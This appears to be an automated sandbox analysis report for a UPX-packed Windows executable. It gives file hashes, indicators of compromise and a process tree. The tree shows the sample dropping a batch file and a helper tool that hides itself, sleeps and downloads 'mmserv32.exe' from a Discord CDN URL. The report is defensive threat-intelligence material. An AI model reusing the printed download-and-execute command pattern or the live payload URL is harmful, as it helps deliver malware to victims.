ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b

General

Target

a1e0aa315c2caf13f0f7edacea3e9aea.exe
Size

450KB
MD5

a1e0aa315c2caf13f0f7edacea3e9aea
SHA1

3e768bdf99b6e40d8da1a0a74f345c8a316a6b89
SHA256

ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b
SHA512

40aa04ce71823a9fa163c970263967cba1bec99fff08ff1abb0d5ba0a7b450e9733e9910a63023ca12e26b9d38399b1750676dda70a934e97ecc0f4093c708d0
SSDEEP

12288:0tzE5elwLz9Tr/G89suLMBU2R6rPfgi5QGRTYseAC+kYr8:0tA4KdTDG/hRaAiZRTyRpYA

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
2668	extd.exe
2532	extd.exe
2640	extd.exe
2800	extd.exe

Loads dropped DLL 8 IoCs

pid	Process
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe
2816	cmd.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000016281-3.dat	upx
behavioral1/memory/2816-6-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2668-8-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2668-10-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2532-14-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2532-15-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2640-23-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2816-31-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2816-32-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2800-33-0x0000000140000000-0x00000001400D8000-memory.dmp	upx

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 2816	3036	a1e0aa315c2caf13f0f7edacea3e9aea.exe	29
PID 3036 wrote to memory of 2816	3036	a1e0aa315c2caf13f0f7edacea3e9aea.exe	29
PID 3036 wrote to memory of 2816	3036	a1e0aa315c2caf13f0f7edacea3e9aea.exe	29
PID 2816 wrote to memory of 2668	2816	cmd.exe	30
PID 2816 wrote to memory of 2668	2816	cmd.exe	30
PID 2816 wrote to memory of 2668	2816	cmd.exe	30
PID 2816 wrote to memory of 2532	2816	cmd.exe	31
PID 2816 wrote to memory of 2532	2816	cmd.exe	31
PID 2816 wrote to memory of 2532	2816	cmd.exe	31
PID 2816 wrote to memory of 2640	2816	cmd.exe	32
PID 2816 wrote to memory of 2640	2816	cmd.exe	32
PID 2816 wrote to memory of 2640	2816	cmd.exe	32
PID 2816 wrote to memory of 2800	2816	cmd.exe	33
PID 2816 wrote to memory of 2800	2816	cmd.exe	33
PID 2816 wrote to memory of 2800	2816	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe
"C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\50FF.bat C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2668
- - C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2532
- - C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2640
- - C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2800

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\50FF.bat

Filesize
942B

MD5
2a48b2fe180dbf697cc9618a3dd058bb

SHA1
40a1c860da9d186e15f153101a2d3c8d76dc50d3

SHA256
62464af0ba4a6af954d03b534c9277c804cd1f470c0b24572f580558cafb23cb

SHA512
27f2d16d7cad20f4b6102df4191d3e90cb9a3d46b26329edf9d642852499f5933424826684c1936b6437807a91803502cc3fd47fd06fb38865ebce7ce00b6c92

Download Submit
\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\extd.exe

Filesize
326KB

MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
memory/2532-14-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2532-15-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2640-23-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2668-8-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2668-10-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2800-33-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2816-6-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2816-9-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2816-31-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2816-32-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download

Analysis

Sharing